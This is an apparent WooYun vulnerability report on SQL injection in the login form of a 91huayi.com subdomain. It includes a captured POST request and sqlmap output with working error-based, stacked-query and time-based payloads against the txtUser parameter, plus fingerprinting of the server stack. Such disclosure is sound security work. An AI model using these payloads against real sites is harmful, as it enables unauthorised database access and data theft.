当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154803

漏洞标题:华医网某子站存在sql注入漏洞

相关厂商:91huayi.com

漏洞作者: 路人甲

提交时间:2015-11-23 13:49

修复时间:2015-11-28 13:50

公开时间:2015-11-28 13:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://bzwsw.91huayi.com/Page/MainPage.aspx


登录框处

POST /default_2.aspx HTTP/1.1
Host: hy.91huayi.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://hy.91huayi.com/default_2.aspx
Cookie: ASP.NET_SessionId=rw1l2r553hac2mioxniybtyq
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
__EVENTTARGET=Button1&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE3MTg0OTYyNDVkZB9Jv2PMjfRLTpw7hsjLBDOy0TcE&txtUser=aaa&txtPwd=aaaa&txtYzm=39822&__EVENTVALIDATION=%2FwEWCgLg2cD5AgLB2tiHDgKd%2B7qdDgKS%2B%2BqbCwKM54rGBgL%2B26HhBQLM9PumDwKxi96RBQKWosD8CgL7uKJneRO9RxKAz1G78ZKJkINQFKmltyY%3D


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtUser (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=Button1&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3MTg0OTYyNDVkZB9Jv2PMjfRLTpw7hsjLBDOy0TcE&txtUser=aaa' AND 6981=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6981=6981) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113))) AND 'jbKT'='jbKT&txtPwd=aaaa&txtYzm=39822&__EVENTVALIDATION=/wEWCgLg2cD5AgLB2tiHDgKd+7qdDgKS++qbCwKM54rGBgL+26HhBQLM9PumDwKxi96RBQKWosD8CgL7uKJneRO9RxKAz1G78ZKJkINQFKmltyY=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=Button1&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3MTg0OTYyNDVkZB9Jv2PMjfRLTpw7hsjLBDOy0TcE&txtUser=aaa';WAITFOR DELAY '0:0:5'--&txtPwd=aaaa&txtYzm=39822&__EVENTVALIDATION=/wEWCgLg2cD5AgLB2tiHDgKd+7qdDgKS++qbCwKM54rGBgL+26HhBQLM9PumDwKxi96RBQKWosD8CgL7uKJneRO9RxKAz1G78ZKJkINQFKmltyY=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: __EVENTTARGET=Button1&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3MTg0OTYyNDVkZB9Jv2PMjfRLTpw7hsjLBDOy0TcE&txtUser=aaa' WAITFOR DELAY '0:0:5'--&txtPwd=aaaa&txtYzm=39822&__EVENTVALIDATION=/wEWCgLg2cD5AgLB2tiHDgKd+7qdDgKS++qbCwKM54rGBgL+26HhBQLM9PumDwKxi96RBQKWosD8CgL7uKJneRO9RxKAz1G78ZKJkINQFKmltyY=
---
[00:12:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[00:12:20] [INFO] testing if current user is DBA
current user is DBA:    False


测试的过程中竟然修复了,好神奇。

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-28 13:50

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无